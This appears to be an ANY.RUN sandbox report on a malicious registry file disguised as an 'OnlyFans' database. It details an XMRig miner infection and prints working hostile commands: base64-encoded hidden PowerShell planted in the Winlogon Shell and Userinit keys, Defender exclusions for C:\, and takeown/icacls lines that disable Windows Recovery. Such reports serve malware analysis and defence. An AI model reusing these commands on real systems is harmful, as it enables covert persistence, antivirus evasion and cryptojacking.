File name:

01_OnlyFans_Full_DB_drive.google.com rOpen Google Driverb%0.reg

Full analysis: https://app.any.run/tasks/cfc00c3c-691b-4e12-aa09-36312b1a6128
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Analysis date: April 29, 2026, 20:03:12
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
xmrig
evasion
miner
susp-powershell
adware
antivm
amsi-bypass
Indicators:
MIME: application/octet-stream
File info: data
MD5:

C20D6B9416D05D0E0E3EA904329AAA41

SHA1:

EC6B489E5E3E6D6815FA055751DE2CABFF36EE0C

SHA256:

09613A7351C14F10096A3F365404844D563AB8057E460EF7F57E4781099A764A

SSDEEP:

3072:t9mgk/TSB3sNEec2HnGpkP7FR3Z2+1iSRdLP:t9TP3lH2AkP7FR3ZT1iSRdLP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the login/logoff helper path in the registry

      • regedit.exe (PID: 2456)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6732)
      • powershell.exe (PID: 7616)
    • XMRig has been detected

      • out.exe (PID: 2304)
      • Win-v41.exe (PID: 7988)
      • out.exe (PID: 7712)
    • Adds process to the Windows Defender exclusion list

      • out.exe (PID: 2304)
    • Changes Windows Defender settings

      • out.exe (PID: 2304)
    • Changes the autorun value in the registry

      • out.exe (PID: 2304)
    • Starts REAGENTC.EXE to disable the Windows Recovery Environment

      • ReAgentc.exe (PID: 3092)
    • MINER has been detected (SURICATA)

      • cmd.exe (PID: 7324)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8076)
    • XMRIG has been detected (YARA)

      • cmd.exe (PID: 7324)
  • SUSPICIOUS

    • The process executes via Task Scheduler

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 680)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6732)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6732)
      • out.exe (PID: 2304)
    • Application launched itself

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 680)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 6856)
      • out.exe (PID: 2304)
      • cmd.exe (PID: 6892)
      • powershell.exe (PID: 680)
    • Base64-obfuscated command line is found

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 680)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 680)
    • Script adds exclusion process to Windows Defender

      • out.exe (PID: 2304)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • out.exe (PID: 2304)
    • Creates scheduled task with ONLOGON parameter

      • out.exe (PID: 2304)
    • Creates scheduled task with highest privileges

      • schtasks.exe (PID: 7988)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6884)
      • cmd.exe (PID: 3164)
      • cmd.exe (PID: 7248)
      • cmd.exe (PID: 1832)
      • cmd.exe (PID: 7624)
      • cmd.exe (PID: 6892)
    • There is functionality for VM detection VMWare (YARA)

      • out.exe (PID: 2304)
    • There is functionality for VM detection VirtualBox (YARA)

      • out.exe (PID: 2304)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 3164)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7248)
      • cmd.exe (PID: 1832)
    • Suspicious power configuration changes

      • powercfg.exe (PID: 2664)
      • powercfg.exe (PID: 7852)
      • powercfg.exe (PID: 2940)
      • powercfg.exe (PID: 5700)
      • powercfg.exe (PID: 2332)
      • powercfg.exe (PID: 7848)
      • powercfg.exe (PID: 4332)
    • Uses powercfg.exe to modify the power settings

      • out.exe (PID: 2304)
    • Hides command output

      • cmd.exe (PID: 7624)
    • Checks for external IP

      • out.exe (PID: 2304)
    • Contacting a server suspected of hosting an CnC

      • cmd.exe (PID: 7324)
    • Executes as Windows Service

      • cmd.exe (PID: 6892)
    • ASCII char obfuscation (POWERSHELL)

      • cmd.exe (PID: 6892)
      • powershell.exe (PID: 8076)
    • Escape characters obfuscation (POWERSHELL)

      • cmd.exe (PID: 6892)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6892)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 8076)
    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 8076)
    • Executes application which crashes

      • Win-v41.exe (PID: 7988)
    • Access to an unwanted program domain was detected

      • out.exe (PID: 2304)
    • Possibly patching Antimalware Scan Interface function (YARA)

      • cmd.exe (PID: 7324)
      • conhost.exe (PID: 8172)
    • Potential Corporate Privacy Violation

      • cmd.exe (PID: 7324)
  • INFO

    • Manual execution by a user

      • regedit.exe (PID: 6884)
      • regedit.exe (PID: 4304)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 1780)
      • powershell.exe (PID: 7616)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6856)
      • powershell.exe (PID: 680)
    • Checks supported languages

      • out.exe (PID: 2304)
      • Win-v41.exe (PID: 7988)
      • out.exe (PID: 7712)
    • The executable file from the user directory is run by the Powershell process

      • out.exe (PID: 2304)
      • out.exe (PID: 7712)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8076)
      • powershell.exe (PID: 1312)
      • powershell.exe (PID: 1780)
    • Launching a file from a Registry key

      • out.exe (PID: 2304)
    • Uses Task Scheduler to autorun other applications (AUTOMATE)

      • out.exe (PID: 2304)
    • Creates files or folders in the user directory

      • out.exe (PID: 2304)
    • Reads the computer name

      • out.exe (PID: 2304)
    • Reads security settings of Internet Explorer

      • out.exe (PID: 2304)
    • Reads the machine GUID from the registry

      • out.exe (PID: 2304)
    • Create files in a temporary directory

      • out.exe (PID: 2304)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 8076)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
204
Monitored processes
56
Malicious processes
10
Suspicious processes
2

Behavior graph

Click at the process to see the details
start regedit.exe regedit.exe no specs regedit.exe powershell.exe conhost.exe no specs powershell.exe #XMRIG out.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs schtasks.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs reagentc.exe no specs cmd.exe no specs conhost.exe no specs takeown.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs cmd.exe no specs conhost.exe no specs icacls.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs powercfg.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs #MINER cmd.exe svchost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs #XMRIG win-v41.exe no specs werfault.exe powershell.exe conhost.exe no specs powershell.exe no specs #XMRIG out.exe no specs regedit.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
144\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
680"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
RuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1312powershell -Command "Add-MpPreference -ExclusionProcess 'cmd.exe'; Add-MpPreference -ExclusionPath 'C:\'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeout.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1780powershell -Command "Add-MpPreference -ExclusionProcess 'WinTemp-v4.exe'; Add-MpPreference -ExclusionProcess 'Win-v42.exe'; Add-MpPreference -ExclusionProcess 'Win-v43.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeout.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
1832cmd.exe /C icacls "%SystemRoot%\System32\reagentc.exe" /deny Everyone:RXC:\Windows\System32\cmd.exeout.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
2136\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2304"C:\Users\admin\AppData\Local\Temp\out.exe" C:\Users\admin\AppData\Local\Temp\out.exe
powershell.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\appdata\local\temp\out.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
2324takeown /F "C:\WINDOWS\System32\reagentc.exe"C:\Windows\System32\takeown.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Takes ownership of a file
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\takeown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\sspicli.dll
2332powercfg /change standby-timeout-dc 0C:\Windows\System32\powercfg.exeout.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\bcrypt.dll
2392\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
55 680
Read events
55 576
Write events
41
Delete events
63

Modification events

(PID) Process:(2456) regedit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:Shell
Value:
explorer.exe, powershell -WindowStyle hidden -ec WwBpAG8ALgBmAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAoACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AdQB0AC4AZQB4AGUAJwApACwAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJwBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABXAGkAbgBsAG8AZwBvAG4AJwAgAC0ATgBhAG0AZQAgACcAdABlAG0AcABkAGEAdABhACcAKQAuAHQAZQBtAHAAZABhAHQAYQApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAkAGUAbgB2ADoAdABlAG0AcAArACcAXABvAHUAdAAuAGUAeABlACcAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
(PID) Process:(2456) regedit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Operation:writeName:Userinit
Value:
userinit.exe, powershell -WindowStyle hidden -ec WwBpAG8ALgBmAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAoACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AdQB0AC4AZQB4AGUAJwApACwAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJwBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABXAGkAbgBsAG8AZwBvAG4AJwAgAC0ATgBhAG0AZQAgACcAdABlAG0AcABkAGEAdABhACcAKQAuAHQAZQBtAHAAZABhAHQAYQApADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAkAGUAbgB2ADoAdABlAG0AcAArACcAXABvAHUAdAAuAGUAeABlACcAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A
(PID) Process:(2304) out.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\$SHconfig\startup
Operation:writeName:v4
Value:
C:\Windows\Win-v41.exe
(PID) Process:(2304) out.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:v4
Value:
C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\Win-v43.exe
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001
Operation:delete keyName:(default)
Value:
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\11000001
Operation:writeName:Element
Value:
0000000000000000000000000000000006000000000000004800000000000000715E5C2FA985EB1190A89A9B763584210000000000000000745E5C2FA985EB1190A89A9B7635842100000000000000000000000000000000
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000002
Operation:delete keyName:(default)
Value:
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\Elements\12000002
Operation:writeName:Element
Value:
\EFI\Microsoft\Boot\bootmgfw.efi
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\11000001
Operation:delete keyName:(default)
Value:
(PID) Process:(3092) ReAgentc.exeKey:HKEY_LOCAL_MACHINE\BCD00000000\Objects\{872a075f-9aa9-11f0-b4fb-806e6f6e6963}\Elements\11000001
Operation:writeName:Element
Value:
0000000000000000000000000000000006000000000000004800000000000000715E5C2FA985EB1190A89A9B763584210000000000000000745E5C2FA985EB1190A89A9B7635842100000000000000000000000000000000
Executable files
6
Suspicious files
18
Text files
32
Unknown types
0

Dropped files

PID
Process
Filename
Type
6856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OR9LCA8LYXEECS0H0OWY.tempbinary
MD5:652BF4C2BC07CB4F6D1883B118ED0B89
SHA256:E16DC90634F291D7396EB98FB2F7AED192EDBF58E6CA8294214B769F2BBBED36
6856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF102165.TMPbinary
MD5:00A03B286E6E0EBFF8D9C492365D5EC2
SHA256:4DBFC417D053BA6867308671F1C61F4DCAFC61F058D4044DB532DA6D3BDE3615
6856powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aejqn2ie.waj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6732powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j5trduqk.bfk.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6732powershell.exeC:\Users\admin\AppData\Local\Temp\out.exeexecutable
MD5:7CF958205638DEA76622CA50A6CA03A9
SHA256:6D62E548100A792B3858FFFF5DC5003A52816C5E8A73784E11F5A12218D03BFD
6732powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:7EC9BEF2E530C04DEB8B8166FAE47A07
SHA256:B7A756660C63D5A7F8E035BEC3B5E146E39F45AEAAB8BF298473BDCC8F6DD3AC
8076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yjfpdoao.xsz.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3092ReAgentc.exeC:\Windows\System32\Recovery\Winre.wim
MD5:
SHA256:
6856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttext
MD5:A8FD70799314251ACE270DE2757B26C1
SHA256:5012B8A81FA2BC0C2211294F9354900859F9769B06147EA64F6B5416A0CAE7C9
6856powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:652BF4C2BC07CB4F6D1883B118ED0B89
SHA256:E16DC90634F291D7396EB98FB2F7AED192EDBF58E6CA8294214B769F2BBBED36
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
431
TCP/UDP connections
348
DNS requests
90
Threats
314

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
204.79.197.203:80
http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D
US
binary
923 b
whitelisted
GET
200
162.159.142.9:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D
US
binary
314 b
whitelisted
5316
svchost.exe
POST
400
20.190.160.17:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
204 b
whitelisted
5532
SearchApp.exe
GET
304
92.123.104.31:443
https://www.bing.com/rp/ANzUnPnVY0oL0XWxs0RLJxjJLUo.br.js
NL
whitelisted
5316
svchost.exe
POST
400
20.190.160.17:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
204 b
whitelisted
6076
svchost.exe
GET
200
51.124.78.146:443
https://settings-win.data.microsoft.com/settings/v3.0/WSD/WaaSAssessment?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&ring=Retail&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=10.0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=WaaSAssessment&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&ServicingBranch=CB&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&HonorWUfBDeferrals=1&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2
US
text
5.80 Kb
whitelisted
6076
svchost.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5532
SearchApp.exe
GET
200
92.123.104.32:443
https://th.bing.com/th?id=ODSWG.IotdLocalIcon&w=16&h=16&c=1&rs=1&p=0
NL
image
1.98 Kb
whitelisted
6076
svchost.exe
GET
200
2.16.164.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5316
svchost.exe
POST
400
20.190.160.17:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
204 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6076
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5532
SearchApp.exe
92.123.104.31:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
162.159.142.9:80
ocsp.digicert.com
CLOUDFLARENET
US
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
5316
svchost.exe
20.190.160.17:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5316
svchost.exe
162.159.142.9:80
ocsp.digicert.com
CLOUDFLARENET
US
whitelisted

DNS requests

Domain
IP
Reputation
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
google.com
  • 142.251.14.138
  • 142.251.14.139
  • 142.251.14.113
  • 142.251.14.100
  • 142.251.14.101
  • 142.251.14.102
whitelisted
www.bing.com
  • 92.123.104.31
  • 92.123.104.18
  • 92.123.104.17
  • 92.123.104.29
  • 92.123.104.30
  • 92.123.104.32
  • 92.123.104.21
  • 92.123.104.26
  • 92.123.104.16
whitelisted
ocsp.digicert.com
  • 162.159.142.9
  • 172.66.2.5
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
login.live.com
  • 20.190.160.17
  • 20.190.160.20
  • 20.190.160.132
  • 20.190.160.66
  • 40.126.32.68
  • 20.190.160.131
  • 20.190.160.2
  • 20.190.160.128
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
  • 23.216.77.30
  • 23.216.77.38
  • 23.216.77.8
  • 23.216.77.22
  • 23.216.77.19
  • 23.216.77.36
  • 23.216.77.20
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
6076
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2304
out.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
2304
out.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 35
2304
out.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 7
2232
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
2304
out.exe
Misc activity
ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2232
svchost.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (pixeldrain .com)
2304
out.exe
Misc activity
ET FILE_SHARING File Sharing Domain Observed in TLS SNI (pixeldrain .com)
7324
cmd.exe
Potential Corporate Privacy Violation
ET INFO Cryptocurrency Miner Checkin
7324
cmd.exe
Malware Command and Control Activity Detected
MINER [ANY.RUN] XMRig Stratum Login Activity
No debug info